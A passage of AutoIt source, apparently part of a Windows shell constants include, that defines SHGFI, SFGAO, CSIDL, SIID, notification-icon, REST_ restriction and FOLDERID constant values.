GLOBAL CONST $SHGFI_SHELLICONSIZE = 4 GLOBAL CONST $SHGFI_SMALLICON = 1 GLOBAL CONST $SHGFI_SYSICONINDEX = 16384 GLOBAL CONST $SHGFI_TYPENAME = 1024 GLOBAL CONST $SHGFI_USEFILEATTRIBUTES = 16 GLOBAL CONST $SFGAO_CANCOPY = 1 GLOBAL CONST $SFGAO_CANMOVE = 2 GLOBAL CONST $SFGAO_CANLINK = 4 GLOBAL CONST $SFGAO_STORAGE = 8 GLOBAL CONST $SFGAO_CANRENAME = 16 GLOBAL CONST $SFGAO_CANDELETE = 32 GLOBAL CONST $SFGAO_HASPROPSHEET = 64 GLOBAL CONST $SFGAO_DROPTARGET = 256 GLOBAL CONST $SFGAO_CAPABILITYMASK = BITOR ($SFGAO_CANCOPY , $SFGAO_CANMOVE , $SFGAO_CANLINK , $SFGAO_CANRENAME , $SFGAO_CANDELETE , $SFGAO_HASPROPSHEET , $SFGAO_DROPTARGET ) GLOBAL CONST $SFGAO_SYSTEM = 4096 GLOBAL CONST $SFGAO_ENCRYPTED = 8192 GLOBAL CONST $SFGAO_ISSLOW = 16384 GLOBAL CONST $SFGAO_GHOSTED = 32768 GLOBAL CONST $SFGAO_LINK = 65536 GLOBAL CONST $SFGAO_SHARE = 131072 GLOBAL CONST $SFGAO_READONLY = 262144 GLOBAL CONST $SFGAO_HIDDEN = 524288 GLOBAL CONST $SFGAO_DISPLAYATTRMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_GHOSTED , $SFGAO_LINK , $SFGAO_SHARE , $SFGAO_READONLY , $SFGAO_HIDDEN ) GLOBAL CONST $SFGAO_NONENUMERATED = 1048576 GLOBAL CONST $SFGAO_NEWCONTENT = 2097152 GLOBAL CONST $SFGAO_STREAM = 4194304 GLOBAL CONST $SFGAO_STORAGEANCESTOR = 8388608 GLOBAL CONST $SFGAO_VALIDATE = 16777216 GLOBAL CONST $SFGAO_REMOVABLE = 33554432 GLOBAL CONST $SFGAO_COMPRESSED = 67108864 GLOBAL CONST $SFGAO_BROWSABLE = 134217728 GLOBAL CONST $SFGAO_FILESYSANCESTOR = 268435456 GLOBAL CONST $SFGAO_FOLDER = 536870912 GLOBAL CONST $SFGAO_FILESYSTEM = 1073741824 GLOBAL CONST $SFGAO_STORAGECAPMASK = BITOR ($SFGAO_STORAGE , $SFGAO_LINK , $SFGAO_READONLY , $SFGAO_STREAM , $SFGAO_STORAGEANCESTOR , $SFGAO_FILESYSANCESTOR , $SFGAO_FOLDER , $SFGAO_FILESYSTEM ) GLOBAL CONST $SFGAO_HASSUBFOLDER = 2147483648 GLOBAL CONST $SFGAO_CONTENTSMASK = $SFGAO_HASSUBFOLDER GLOBAL CONST $SFGAO_PKEYSFGAOMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_READONLY , $SFGAO_HASSUBFOLDER , $SFGAO_VALIDATE ) GLOBAL CONST $IDO_SHGIOI_DEFAULT = 268435452 GLOBAL CONST $IDO_SHGIOI_LINK = 268435454 GLOBAL CONST $IDO_SHGIOI_SHARE = 268435455 GLOBAL CONST $IDO_SHGIOI_SLOWFILE = 268435453 GLOBAL CONST $FCSM_VIEWID = 1 GLOBAL CONST $FCSM_WEBVIEWTEMPLATE = 2 GLOBAL CONST $FCSM_INFOTIP = 4 GLOBAL CONST $FCSM_CLSID = 8 GLOBAL CONST $FCSM_ICONFILE = 16 GLOBAL CONST $FCSM_LOGO = 32 GLOBAL CONST $FCSM_FLAGS = 64 GLOBAL CONST $FCS_READ = 1 GLOBAL CONST $FCS_FORCEWRITE = 2 GLOBAL CONST $FCS_WRITE = BITOR ($FCS_READ , $FCS_FORCEWRITE ) GLOBAL CONST $SSF_AUTOCHECKSELECT = 8388608 GLOBAL CONST $SSF_DESKTOPHTML = 512 GLOBAL CONST $SSF_DONTPRETTYPATH = 2048 GLOBAL CONST $SSF_DOUBLECLICKINWEBVIEW = 128 GLOBAL CONST $SSF_HIDEICONS = 16384 GLOBAL CONST $SSF_ICONSONLY = 16777216 GLOBAL CONST $SSF_MAPNETDRVBUTTON = 4096 GLOBAL CONST $SSF_NOCONFIRMRECYCLE = 32768 GLOBAL CONST $SSF_NONETCRAWLING = 1048576 GLOBAL CONST $SSF_SEPPROCESS = 524288 GLOBAL CONST $SSF_SHOWALLOBJECTS = 1 GLOBAL CONST $SSF_SHOWCOMPCOLOR = 8 GLOBAL CONST $SSF_SHOWEXTENSIONS = 2 GLOBAL CONST $SSF_SHOWINFOTIP = 8192 GLOBAL CONST $SSF_SHOWSUPERHIDDEN = 262144 GLOBAL CONST $SSF_SHOWSYSFILES = 32 GLOBAL CONST $SSF_SHOWTYPEOVERLAY = 33554432 GLOBAL CONST $SSF_STARTPANELON = 2097152 GLOBAL CONST $SSF_WIN95CLASSIC = 1024 GLOBAL CONST $SSF_WEBVIEW = 131072 GLOBAL CONST $CSIDL_ADMINTOOLS = 48 GLOBAL CONST $CSIDL_ALTSTARTUP = 29 GLOBAL CONST $CSIDL_APPDATA = 26 GLOBAL CONST $CSIDL_BITBUCKET = 10 GLOBAL CONST $CSIDL_CDBURN_AREA = 59 GLOBAL CONST $CSIDL_COMMON_ADMINTOOLS = 47 GLOBAL CONST $CSIDL_COMMON_ALTSTARTUP = 30 GLOBAL CONST $CSIDL_COMMON_APPDATA = 35 GLOBAL CONST $CSIDL_COMMON_DESKTOPDIRECTORY = 25 GLOBAL CONST $CSIDL_COMMON_DOCUMENTS = 46 GLOBAL CONST $CSIDL_COMMON_FAVORITES = 31 GLOBAL CONST $CSIDL_COMMON_MUSIC = 53 GLOBAL CONST $CSIDL_COMMON_PICTURES = 54 GLOBAL CONST $CSIDL_COMMON_PROGRAMS = 23 GLOBAL CONST $CSIDL_COMMON_STARTMENU = 22 GLOBAL CONST $CSIDL_COMMON_STARTUP = 24 GLOBAL CONST $CSIDL_COMMON_TEMPLATES = 45 GLOBAL CONST $CSIDL_COMMON_VIDEO = 55 GLOBAL CONST $CSIDL_COMPUTERSNEARME = 61 GLOBAL CONST $CSIDL_CONNECTIONS = 49 GLOBAL CONST $CSIDL_CONTROLS = 3 GLOBAL CONST $CSIDL_COOKIES = 33 GLOBAL CONST $CSIDL_DESKTOP = 0 GLOBAL CONST $CSIDL_DESKTOPDIRECTORY = 16 GLOBAL CONST $CSIDL_DRIVES = 17 GLOBAL CONST $CSIDL_FAVORITES = 6 GLOBAL CONST $CSIDL_FONTS = 20 GLOBAL CONST $CSIDL_INTERNET_CACHE = 32 GLOBAL CONST $CSIDL_HISTORY = 34 GLOBAL CONST $CSIDL_LOCAL_APPDATA = 28 GLOBAL CONST $CSIDL_MYMUSIC = 13 GLOBAL CONST $CSIDL_MYPICTURES = 39 GLOBAL CONST $CSIDL_MYVIDEO = 14 GLOBAL CONST $CSIDL_NETHOOD = 19 GLOBAL CONST $CSIDL_PERSONAL = 5 GLOBAL CONST $CSIDL_PRINTERS = 4 GLOBAL CONST $CSIDL_PRINTHOOD = 27 GLOBAL CONST $CSIDL_PROFILE = 40 GLOBAL CONST $CSIDL_PROGRAM_FILES = 38 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMON = 43 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMONX86 = 44 GLOBAL CONST $CSIDL_PROGRAM_FILESX86 = 42 GLOBAL CONST $CSIDL_PROGRAMS = 2 GLOBAL CONST $CSIDL_RECENT = 8 GLOBAL CONST $CSIDL_SENDTO = 9 GLOBAL CONST $CSIDL_STARTMENU = 11 GLOBAL CONST $CSIDL_STARTUP = 7 GLOBAL CONST $CSIDL_SYSTEM = 37 GLOBAL CONST $CSIDL_SYSTEMX86 = 41 GLOBAL CONST $CSIDL_TEMPLATES = 21 GLOBAL CONST $CSIDL_WINDOWS = 36 GLOBAL CONST $SIID_DOCNOASSOC = 0 GLOBAL CONST $SIID_DOCASSOC = 1 GLOBAL CONST $SIID_APPLICATION = 2 GLOBAL CONST $SIID_FOLDER = 3 GLOBAL CONST $SIID_FOLDEROPEN = 4 GLOBAL CONST $SIID_DRIVE525 = 5 GLOBAL CONST $SIID_DRIVE35 = 6 GLOBAL CONST $SIID_DRIVEREMOVE = 7 GLOBAL CONST $SIID_DRIVEFIXED = 8 GLOBAL CONST $SIID_DRIVENET = 9 GLOBAL CONST $SIID_DRIVENETDISABLED = 10 GLOBAL CONST $SIID_DRIVECD = 11 GLOBAL CONST $SIID_DRIVERAM = 12 GLOBAL CONST $SIID_WORLD = 13 GLOBAL CONST $SIID_SERVER = 15 GLOBAL CONST $SIID_PRINTER = 16 GLOBAL CONST $SIID_MYNETWORK = 17 GLOBAL CONST $SIID_FIND = 22 GLOBAL CONST $SIID_HELP = 23 GLOBAL CONST $SIID_SHARE = 28 GLOBAL CONST $SIID_LINK = 29 GLOBAL CONST $SIID_SLOWFILE = 30 GLOBAL CONST $SIID_RECYCLER = 31 GLOBAL CONST $SIID_RECYCLERFULL = 32 GLOBAL CONST $SIID_MEDIACDAUDIO = 40 GLOBAL CONST $SIID_LOCK = 47 GLOBAL CONST $SIID_AUTOLIST = 49 GLOBAL CONST $SIID_PRINTERNET = 50 GLOBAL CONST $SIID_SERVERSHARE = 51 GLOBAL CONST $SIID_PRINTERFAX = 52 GLOBAL CONST $SIID_PRINTERFAXNET = 53 GLOBAL CONST $SIID_PRINTERFILE = 54 GLOBAL CONST $SIID_STACK = 55 GLOBAL CONST $SIID_MEDIASVCD = 56 GLOBAL CONST $SIID_STUFFEDFOLDER = 57 GLOBAL CONST $SIID_DRIVEUNKNOWN = 58 GLOBAL CONST $SIID_DRIVEDVD = 59 GLOBAL CONST $SIID_MEDIADVD = 60 GLOBAL CONST $SIID_MEDIADVDRAM = 61 GLOBAL CONST $SIID_MEDIADVDRW = 62 GLOBAL CONST $SIID_MEDIADVDR = 63 GLOBAL CONST $SIID_MEDIADVDROM = 64 GLOBAL CONST $SIID_MEDIACDAUDIOPLUS = 65 GLOBAL CONST $SIID_MEDIACDRW = 66 GLOBAL CONST $SIID_MEDIACDR = 67 GLOBAL CONST $SIID_MEDIACDBURN = 68 GLOBAL CONST $SIID_MEDIABLANKCD = 69 GLOBAL CONST $SIID_MEDIACDROM = 70 GLOBAL CONST $SIID_AUDIOFILES = 71 GLOBAL CONST $SIID_IMAGEFILES = 72 GLOBAL CONST $SIID_VIDEOFILES = 73 GLOBAL CONST $SIID_MIXEDFILES = 74 GLOBAL CONST $SIID_FOLDERBACK = 75 GLOBAL CONST $SIID_FOLDERFRONT = 76 GLOBAL CONST $SIID_SHIELD = 77 GLOBAL CONST $SIID_WARNING = 78 GLOBAL CONST $SIID_INFO = 79 GLOBAL CONST $SIID_ERROR = 80 GLOBAL CONST $SIID_KEY = 81 GLOBAL CONST $SIID_SOFTWARE = 82 GLOBAL CONST $SIID_RENAME = 83 GLOBAL CONST $SIID_DELETE = 84 GLOBAL CONST $SIID_MEDIAAUDIODVD = 85 GLOBAL CONST $SIID_MEDIAMOVIEDVD = 86 GLOBAL CONST $SIID_MEDIAENHANCEDCD = 87 GLOBAL CONST $SIID_MEDIAENHANCEDDVD = 88 GLOBAL CONST $SIID_MEDIAHDDVD = 89 GLOBAL CONST $SIID_MEDIABLURAY = 90 GLOBAL CONST $SIID_MEDIAVCD = 91 GLOBAL CONST $SIID_MEDIADVDPLUSR = 92 GLOBAL CONST $SIID_MEDIADVDPLUSRW = 93 GLOBAL CONST $SIID_DESKTOPPC = 94 GLOBAL CONST $SIID_MOBILEPC = 95 GLOBAL CONST $SIID_USERS = 96 GLOBAL CONST $SIID_MEDIASMARTMEDIA = 97 GLOBAL CONST $SIID_MEDIACOMPACTFLASH = 98 GLOBAL CONST $SIID_DEVICECELLPHONE = 99 GLOBAL CONST $SIID_DEVICECAMERA = 100 GLOBAL CONST $SIID_DEVICEVIDEOCAMERA = 101 GLOBAL CONST $SIID_DEVICEAUDIOPLAYER = 102 GLOBAL CONST $SIID_NETWORKCONNECT = 103 GLOBAL CONST $SIID_INTERNET = 104 GLOBAL CONST $SIID_ZIPFILE = 105 GLOBAL CONST $SIID_SETTINGS = 106 GLOBAL CONST $SIID_DRIVEHDDVD = 132 GLOBAL CONST $SIID_DRIVEBD = 133 GLOBAL CONST $SIID_MEDIAHDDVDROM = 134 GLOBAL CONST $SIID_MEDIAHDDVDR = 135 GLOBAL CONST $SIID_MEDIAHDDVDRAM = 136 GLOBAL CONST $SIID_MEDIABDROM = 137 GLOBAL CONST $SIID_MEDIABDR = 138 GLOBAL CONST $SIID_MEDIABDRE = 139 GLOBAL CONST $SIID_CLUSTEREDDRIVE = 140 GLOBAL CONST $SIID_MAX_ICONS = 174 GLOBAL CONST $SHGSI_ICONLOCATION = 0 GLOBAL CONST $SHGSI_ICON = $SHGFI_ICON GLOBAL CONST $SHGSI_SYSICONINDEX = $SHGFI_SYSICONINDEX GLOBAL CONST $SHGSI_LINKOVERLAY = $SHGFI_LINKOVERLAY GLOBAL CONST $SHGSI_SELECTED = $SHGFI_SELECTED GLOBAL CONST $SHGSI_LARGEICON = $SHGFI_LARGEICON GLOBAL CONST $SHGSI_SMALLICON = $SHGFI_SMALLICON GLOBAL CONST $SHGSI_SHELLICONSIZE = $SHGFI_SHELLICONSIZE GLOBAL CONST $NIM_ADD = 0 GLOBAL CONST $NIM_MODIFY = 1 GLOBAL CONST $NIM_DELETE = 2 GLOBAL CONST $NIM_SETFOCUS = 3 GLOBAL CONST $NIM_SETVERSION = 4 GLOBAL CONST $NIF_MESSAGE = 1 GLOBAL CONST $NIF_ICON = 2 GLOBAL CONST $NIF_TIP = 4 GLOBAL CONST $NIF_STATE = 8 GLOBAL CONST $NIF_INFO = 16 GLOBAL CONST $NIF_GUID = 32 GLOBAL CONST $NIF_REALTIME = 64 GLOBAL CONST $NIF_SHOWTIP = 128 GLOBAL CONST $NIS_HIDDEN = 1 GLOBAL CONST $NIS_SHAREDICON = 2 GLOBAL CONST $NIIF_NONE = 0 GLOBAL CONST $NIIF_INFO = 1 GLOBAL CONST $NIIF_WARNING = 2 GLOBAL CONST $NIIF_ERROR = 3 GLOBAL CONST $NIIF_USER = 4 GLOBAL CONST $NIIF_NOSOUND = 16 GLOBAL CONST $NIIF_LARGE_ICON = 16 GLOBAL CONST $NIIF_RESPECT_QUIET_TIME = 128 GLOBAL CONST $NIIF_ICON_MASK = 15 GLOBAL CONST $SHOP_PRINTERNAME = 1 GLOBAL CONST $SHOP_FILEPATH = 2 GLOBAL CONST $SHOP_VOLUMEGUID = 4 GLOBAL CONST $OFASI_EDIT = 1 GLOBAL CONST $OFASI_OPENDESKTOP = 2 GLOBAL CONST $QUNS_NOT_PRESENT = 1 GLOBAL CONST $QUNS_BUSY = 2 GLOBAL CONST $QUNS_RUNNING_D3D_FULL_SCREEN = 3 GLOBAL CONST $QUNS_PRESENTATION_MODE = 4 GLOBAL CONST $QUNS_ACCEPTS_NOTIFICATIONS = 5 GLOBAL CONST $QUNS_QUIET_TIME = 6 GLOBAL CONST $REST_NORUN = 1 GLOBAL CONST $REST_NOCLOSE = 2 GLOBAL CONST $REST_NOSAVESET = 3 GLOBAL CONST $REST_NOFILEMENU = 4 GLOBAL CONST $REST_NOSETFOLDERS = 5 GLOBAL CONST $REST_NOSETTASKBAR = 6 GLOBAL CONST $REST_NODESKTOP = 7 GLOBAL CONST $REST_NOFIND = 8 GLOBAL CONST $REST_NODRIVES = 9 GLOBAL CONST $REST_NODRIVEAUTORUN = 10 GLOBAL CONST $REST_NODRIVETYPEAUTORUN = 11 GLOBAL CONST $REST_NONETHOOD = 12 GLOBAL CONST $REST_STARTBANNER = 13 GLOBAL CONST $REST_RESTRICTRUN = 14 GLOBAL CONST $REST_NOPRINTERTABS = 15 GLOBAL CONST $REST_NOPRINTERDELETE = 16 GLOBAL CONST $REST_NOPRINTERADD = 17 GLOBAL CONST $REST_NOSTARTMENUSUBFOLDERS = 18 GLOBAL CONST $REST_MYDOCSONNET = 19 GLOBAL CONST $REST_NOEXITTODOS = 20 GLOBAL CONST $REST_ENFORCESHELLEXTSECURITY = 21 GLOBAL CONST $REST_LINKRESOLVEIGNORELINKINFO = 22 GLOBAL CONST $REST_NOCOMMONGROUPS = 23 GLOBAL CONST $REST_SEPARATEDESKTOPPROCESS = 24 GLOBAL CONST $REST_NOWEB = 25 GLOBAL CONST $REST_NOTRAYCONTEXTMENU = 26 GLOBAL CONST $REST_NOVIEWCONTEXTMENU = 27 GLOBAL CONST $REST_NONETCONNECTDISCONNECT = 28 GLOBAL CONST $REST_STARTMENULOGOFF = 29 GLOBAL CONST $REST_NOSETTINGSASSIST = 30 GLOBAL CONST $REST_NOINTERNETICON = 31 GLOBAL CONST $REST_NORECENTDOCSHISTORY = 32 GLOBAL CONST $REST_NORECENTDOCSMENU = 33 GLOBAL CONST $REST_NOACTIVEDESKTOP = 34 GLOBAL CONST $REST_NOACTIVEDESKTOPCHANGES = 35 GLOBAL CONST $REST_NOFAVORITESMENU = 36 GLOBAL CONST $REST_CLEARRECENTDOCSONEXIT = 37 GLOBAL CONST $REST_CLASSICSHELL = 38 GLOBAL CONST $REST_NOCUSTOMIZEWEBVIEW = 39 GLOBAL CONST $REST_NOHTMLWALLPAPER = 40 GLOBAL CONST $REST_NOCHANGINGWALLPAPER = 41 GLOBAL CONST $REST_NODESKCOMP = 42 GLOBAL CONST $REST_NOADDDESKCOMP = 43 GLOBAL CONST $REST_NODELDESKCOMP = 44 GLOBAL CONST $REST_NOCLOSEDESKCOMP = 45 GLOBAL CONST $REST_NOCLOSE_DRAGDROPBAND = 46 GLOBAL CONST $REST_NOMOVINGBAND = 47 GLOBAL CONST $REST_NOEDITDESKCOMP = 48 GLOBAL CONST $REST_NORESOLVESEARCH = 49 GLOBAL CONST $REST_NORESOLVETRACK = 50 GLOBAL CONST $REST_FORCECOPYACLWITHFILE = 51 GLOBAL CONST $REST_NOLOGO3CHANNELNOTIFY = 52 GLOBAL CONST $REST_NOFORGETSOFTWAREUPDATE = 53 GLOBAL CONST $REST_NOSETACTIVEDESKTOP = 54 GLOBAL CONST $REST_NOUPDATEWINDOWS = 55 GLOBAL CONST $REST_NOCHANGESTARMENU = 56 GLOBAL CONST $REST_NOFOLDEROPTIONS = 57 GLOBAL CONST $REST_HASFINDCOMPUTERS = 58 GLOBAL CONST $REST_INTELLIMENUS = 59 GLOBAL CONST $REST_RUNDLGMEMCHECKBOX = 60 GLOBAL CONST $REST_ARP_SHOWPOSTSETUP = 61 GLOBAL CONST $REST_NOCSC = 62 GLOBAL CONST $REST_NOCONTROLPANEL = 63 GLOBAL CONST $REST_ENUMWORKGROUP = 64 GLOBAL CONST $REST_ARP_NOARP = 65 GLOBAL CONST $REST_ARP_NOREMOVEPAGE = 66 GLOBAL CONST $REST_ARP_NOADDPAGE = 67 GLOBAL CONST $REST_ARP_NOWINSETUPPAGE = 68 GLOBAL CONST $REST_GREYMSIADS = 69 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVELABEL = 70 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVECOMMENT = 71 GLOBAL CONST $REST_MAXRECENTDOCS = 72 GLOBAL CONST $REST_NONETWORKCONNECTIONS = 73 GLOBAL CONST $REST_FORCESTARTMENULOGOFF = 74 GLOBAL CONST $REST_NOWEBVIEW = 75 GLOBAL CONST $REST_NOCUSTOMIZETHISFOLDER = 76 GLOBAL CONST $REST_NOENCRYPTION = 77 GLOBAL CONST $REST_DONTSHOWSUPERHIDDEN = 78 GLOBAL CONST $REST_NOSHELLSEARCHBUTTON = 79 GLOBAL CONST $REST_NOHARDWARETAB = 80 GLOBAL CONST $REST_NORUNASINSTALLPROMPT = 81 GLOBAL CONST $REST_PROMPTRUNASINSTALLNETPATH = 82 GLOBAL CONST $REST_NOMANAGEMYCOMPUTERVERB = 83 GLOBAL CONST $REST_NORECENTDOCSNETHOOD = 84 GLOBAL CONST $REST_DISALLOWRUN = 85 GLOBAL CONST $REST_NOWELCOMESCREEN = 86 GLOBAL CONST $REST_RESTRICTCPL = 87 GLOBAL CONST $REST_DISALLOWCPL = 88 GLOBAL CONST $REST_NOSMBALLOONTIP = 89 GLOBAL CONST $REST_NOSMHELP = 90 GLOBAL CONST $REST_NOWINKEYS = 91 GLOBAL CONST $REST_NOENCRYPTONMOVE = 92 GLOBAL CONST $REST_NOLOCALMACHINERUN = 93 GLOBAL CONST $REST_NOCURRENTUSERRUN = 94 GLOBAL CONST $REST_NOLOCALMACHINERUNONCE = 95 GLOBAL CONST $REST_NOCURRENTUSERRUNONCE = 96 GLOBAL CONST $REST_FORCEACTIVEDESKTOPON = 97 GLOBAL CONST $REST_NOCOMPUTERSNEARME = 98 GLOBAL CONST $REST_NOVIEWONDRIVE = 99 GLOBAL CONST $REST_NONETCRAWL = 100 GLOBAL CONST $REST_NOSHAREDDOCUMENTS = 101 GLOBAL CONST $REST_NOSMMYDOCS = 102 GLOBAL CONST $REST_NOSMMYPICS = 103 GLOBAL CONST $REST_ALLOWBITBUCKDRIVES = 104 GLOBAL CONST $REST_NONLEGACYSHELLMODE = 105 GLOBAL CONST $REST_NOCONTROLPANELBARRICADE = 106 GLOBAL CONST $REST_NOSTARTPAGE = 107 GLOBAL CONST $REST_NOAUTOTRAYNOTIFY = 108 GLOBAL CONST $REST_NOTASKGROUPING = 109 GLOBAL CONST $REST_NOCDBURNING = 110 GLOBAL CONST $REST_MYCOMPNOPROP = 111 GLOBAL CONST $REST_MYDOCSNOPROP = 112 GLOBAL CONST $REST_NOSTARTPANEL = 113 GLOBAL CONST $REST_NODISPLAYAPPEARANCEPAGE = 114 GLOBAL CONST $REST_NOTHEMESTAB = 115 GLOBAL CONST $REST_NOVISUALSTYLECHOICE = 116 GLOBAL CONST $REST_NOSIZECHOICE = 117 GLOBAL CONST $REST_NOCOLORCHOICE = 118 GLOBAL CONST $REST_SETVISUALSTYLE = 119 GLOBAL CONST $REST_STARTRUNNOHOMEPATH = 120 GLOBAL CONST $REST_NOUSERNAMEINSTARTPANEL = 121 GLOBAL CONST $REST_NOMYCOMPUTERICON = 122 GLOBAL CONST $REST_NOSMNETWORKPLACES = 123 GLOBAL CONST $REST_NOSMPINNEDLIST = 124 GLOBAL CONST $REST_NOSMMYMUSIC = 125 GLOBAL CONST $REST_NOSMEJECTPC = 126 GLOBAL CONST $REST_NOSMMOREPROGRAMS = 127 GLOBAL CONST $REST_NOSMMFUPROGRAMS = 128 GLOBAL CONST $REST_NOTRAYITEMSDISPLAY = 129 GLOBAL CONST $REST_NOTOOLBARSONTASKBAR = 130 GLOBAL CONST $REST_NOSMCONFIGUREPROGRAMS = 131 GLOBAL CONST $REST_HIDECLOCK = 132 GLOBAL CONST $REST_NOLOWDISKSPACECHECKS = 133 GLOBAL CONST $REST_NOENTIRENETWORK = 134 GLOBAL CONST $REST_NODESKTOPCLEANUP = 135 GLOBAL CONST $REST_BITBUCKNUKEONDELETE = 136 GLOBAL CONST $REST_BITBUCKCONFIRMDELETE = 137 GLOBAL CONST $REST_BITBUCKNOPROP = 138 GLOBAL CONST $REST_NODISPBACKGROUND = 139 GLOBAL CONST $REST_NODISPSCREENSAVEPG = 140 GLOBAL CONST $REST_NODISPSETTINGSPG = 141 GLOBAL CONST $REST_NODISPSCREENSAVEPREVIEW = 142 GLOBAL CONST $REST_NODISPLAYCPL = 143 GLOBAL CONST $REST_HIDERUNASVERB = 144 GLOBAL CONST $REST_NOTHUMBNAILCACHE = 145 GLOBAL CONST $REST_NOSTRCMPLOGICAL = 146 GLOBAL CONST $REST_NOPUBLISHWIZARD = 147 GLOBAL CONST $REST_NOONLINEPRINTSWIZARD = 148 GLOBAL CONST $REST_NOWEBSERVICES = 149 GLOBAL CONST $REST_ALLOWUNHASHEDWEBVIEW = 150 GLOBAL CONST $REST_ALLOWLEGACYWEBVIEW = 151 GLOBAL CONST $REST_REVERTWEBVIEWSECURITY = 152 GLOBAL CONST $REST_INHERITCONSOLEHANDLES = 153 GLOBAL CONST $REST_SORTMAXITEMCOUNT = 154 GLOBAL CONST $REST_NOREMOTERECURSIVEEVENTS = 155 GLOBAL CONST $REST_NOREMOTECHANGENOTIFY = 156 GLOBAL CONST $REST_NOSIMPLENETIDLIST = 157 GLOBAL CONST $REST_NOENUMENTIRENETWORK = 158 GLOBAL CONST $REST_NODETAILSTHUMBNAILONNETWORK = 159 GLOBAL CONST $REST_NOINTERNETOPENWITH = 160 GLOBAL CONST $REST_ALLOWLEGACYLMZBEHAVIOR = 161 GLOBAL CONST $REST_DONTRETRYBADNETNAME = 162 GLOBAL CONST $REST_ALLOWFILECLSIDJUNCTIONS = 163 GLOBAL CONST $REST_NOUPNPINSTALL = 164 GLOBAL CONST $REST_ARP_DONTGROUPPATCHES = 165 GLOBAL CONST $REST_ARP_NOCHOOSEPROGRAMSPAGE = 166 GLOBAL CONST $REST_NODISCONNECT = 167 GLOBAL CONST $REST_NOSECURITY = 168 GLOBAL CONST $REST_NOFILEASSOCIATE = 169 GLOBAL CONST $REST_ALLOWCOMMENTTOGGLE = 170 GLOBAL CONST $REST_USEDESKTOPINICACHE = 171 GLOBAL CONST $GIL_DONTCACHE = 16 GLOBAL CONST $GIL_NOTFILENAME = 8 GLOBAL CONST $GIL_PERCLASS = 4 GLOBAL CONST $GIL_PERINSTANCE = 2 GLOBAL CONST $GIL_SIMULATEDOC = 1 GLOBAL CONST $GIL_SHIELD = 512 GLOBAL CONST $GIL_FORCENOSHIELD = 1024 GLOBAL CONST $FOLDERID_ADDNEWPROGRAMS = "{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}" GLOBAL CONST $FOLDERID_ADMINTOOLS = "{724EF170-A42D-4FEF-9F26-B60E846FBA4F}" GLOBAL CONST $FOLDERID_APPUPDATES = "{A305CE99-F527-492B-8B1A-7E76FA98D6E4}" GLOBAL CONST $FOLDERID_CDBURNING = "{9E52AB10-F80D-49DF-ACB8-4330F5687855}" GLOBAL CONST $FOLDERID_CHANGEREMOVEPROGRAMS = "{DF7266AC-9274-4867-8D55-3BD661DE872D}" GLOBAL CONST $FOLDERID_COMMONADMINTOOLS = "{D0384E7D-BAC3-4797-8F14-CBA229B392B5}" GLOBAL CONST $FOLDERID_COMMONOEMLINKS = "{C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D}" GLOBAL CONST $FOLDERID_COMMONPROGRAMS = "{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}" GLOBAL CONST $FOLDERID_COMMONSTARTMENU = "{A4115719-D62E-491D-AA7C-E74B8BE3B067}" GLOBAL CONST $FOLDERID_COMMONSTARTUP = "{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}" GLOBAL CONST $FOLDERID_COMMONTEMPLATES = "{B94237E7-57AC-4347-9151-B08C6C32D1F7}" GLOBAL CONST $FOLDERID_COMPUTERFOLDER = "{0AC0837C-BBF8-452A-850D-79D08E667CA7}" GLOBAL CONST $FOLDERID_CONFLICTFOLDER = "{4BFEFB45-347D-4006-A5BE-AC0CB0567192}" GLOBAL CONST $FOLDERID_CONNECTIONSFOLDER = "{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}" GLOBAL CONST $FOLDERID_CONTACTS = "{56784854-C6CB-462B-8169-88E350ACB882}" GLOBAL CONST $FOLDERID_CONTROLPANELFOLDER = "{82A74AEB-AEB4-465C-A014-D097EE346D63}" GLOBAL CONST $FOLDERID_COOKIES = "{2B0F765D-C0E9-4171-908E-08A611B84FF6}" GLOBAL CONST $FOLDERID_DESKTOP = "{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" GLOBAL CONST $FOLDERID_DEVICEMETADATASTORE = "{5CE4A5E9-E4EB-479D-B89F-130C02886155}" GLOBAL CONST $FOLDERID_DOCUMENTSLIBRARY = "{7B0DB17D-9CD2-4A93-9733-46CC89022E7C}" GLOBAL CONST $FOLDERID_DOWNLOADS = "{374DE290-123F-4565-9164-39C4925E467B}" GLOBAL CONST $FOLDERID_FAVORITES = "{1777F761-68AD-4D8A-87BD-30B759FA33DD}" GLOBAL CONST $FOLDERID_FONTS = "{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}" GLOBAL CONST $FOLDERID_GAMES = "{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}" GLOBAL CONST $FOLDERID_GAMETASKS = "{054FAE61-4DD8-4787-80B6-090220C4B700}" GLOBAL CONST $FOLDERID_HISTORY = "{D9DC8A3B-B784-432E-A781-5A1130A75963}" GLOBAL CONST $FOLDERID_HOMEGROUP = "{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}" GLOBAL CONST $FOLDERID_IMPLICITAPPSHORTCUTS = "{BCB5256F-79F6-4CEE-B725-DC34E402FD46}" GLOBAL CONST $FOLDERID_INTERNETCACHE = "{352481E8-33BE-4251-BA85-6007CAEDCF9D}" GLOBAL CONST $FOLDERID_INTERNETFOLDER = "{4D9F7874-4E0C-4904-967B-40B0D20C3E4B}" GLOBAL CONST $FOLDERID_LIBRARIES = "{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}" GLOBAL CONST $FOLDERID_LINKS = "{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}" GLOBAL CONST $FOLDERID_LOCALAPPDATA = "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" GLOBAL CONST $FOLDERID_LOCALAPPDATALOW = "{A520A1A4-1780-4FF6-BD18-167343C5AF16}" GLOBAL CONST $FOLDERID_LOCALIZEDRESOURCESDIR = "{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}" GLOBAL CONST $FOLDERID_MUSIC = "{4BD8D571-6D19-48D3-BE97-422220080E43}" GLOBAL CONST $FOLDERID_MUSICLIBRARY = "{2112AB0A-C86A-4FFE-A368-0DE96E47012E}" 